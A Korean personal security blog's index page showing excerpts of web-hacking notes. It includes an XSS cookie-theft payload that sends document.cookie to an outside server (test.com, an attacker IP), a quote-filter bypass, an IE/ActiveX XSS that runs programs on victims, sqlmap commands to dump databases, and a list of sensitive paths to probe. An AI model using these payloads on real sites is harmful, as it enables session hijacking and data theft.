목록분류 전체보기 (293)
의미없는 블로그
쿠키 탈취 스크립트는 보통 이거 쓰는데 싱글쿼터나 더블쿼터 막혀있으면 이렇게 아스키값으로 쓰면 된다 아스키 변환 사이트는 여기고 https://www.easycalculation.com/ascii-hex.php 이렇게 괄호 안의 값 아스키로 변환해서 넣으면 된다 String.fromCharCode(document.location="http://test.com/test.php?cookie="+document.cookie;) 1) 공격자가 자신의 서버(150.24.95.134)에 쿠키값 탈취하는 페이지(test.php) 생성한다 2) test.php 작성하고 cookie.txt 만들어 놓기 3) XSS 존재하는 페이지에 악성 스크립트 삽입 시도 (공격자 서버로 쿠키값 보내는 스크립트) [원래 스크립트] [아..
싱글쿼터 안들어가는 XSS 구문 1) 공격자 서버(192.168.211.131)에 test.html 생성 2) test.html 내용 (희생자 PC의 notepad 실행시키는) 3) XSS 존재하는 페이지에 악성 스크립트 삽입 시도 (공격자 서버의 test.html 접속하는 스크립트) 4) 희생자가 XSS 포인트 클릭 5) 희생자 PC에서 notepad 실행됨 IE 취약한 브라우저에서만 된다 ActiveX 설정 관련
안쓰니까 맨날 까먹는 sqlmap 취약 포인트 찾았으면 DB 부터 조회해본다~ sqlmap -u "[URL]" -p [취약 파라미터] -cookie="[세션값]" --dbs 만약에 POST 면 --data="[파라미터]" 이거 추가해주면 될듯 DB 고르고 테이블 조회하기 sqlmap -u "[URL]" -p [취약 파라미터] -cookie="[세션값]" -D [DB명] --tables 특정 테이블의 컬럼 조회하기 sqlmap -u "[URL]" -p [취약 파라미터] -cookie="[세션값]" --D [DB명] -T [테이블명] --columns 데이터 보려면 sqlmap -u "[URL]" -p [취약 파라미터] -cookie="[세션값]" --D [DB명] -T [테이블명] --dump sqlmap..
보호되어 있는 글입니다.
#ckeditor /ckeditor/samples/index.html /ckeditor/_samples/ 샘플 다운로드 : https://ckeditor.com/ckeditor-4/download/ #Tomcat /manager/manager-howto.html /manager/html-manager-howto.html 백업파일(.bak) 으로 만들어서 조치했다고 하기도 하므로 .bak 도 해본다 #기타 cnfr_ctl/login.jsp .bashrc .bash_history .bash_profile .viminfo info.php phpinfo.php myphpinfo.php index1.php sitemap.xml services/AdminService?wsdl (Apache AXIS 서버?) ser..
보호되어 있는 글입니다.
보호되어 있는 글입니다.
보호되어 있는 글입니다.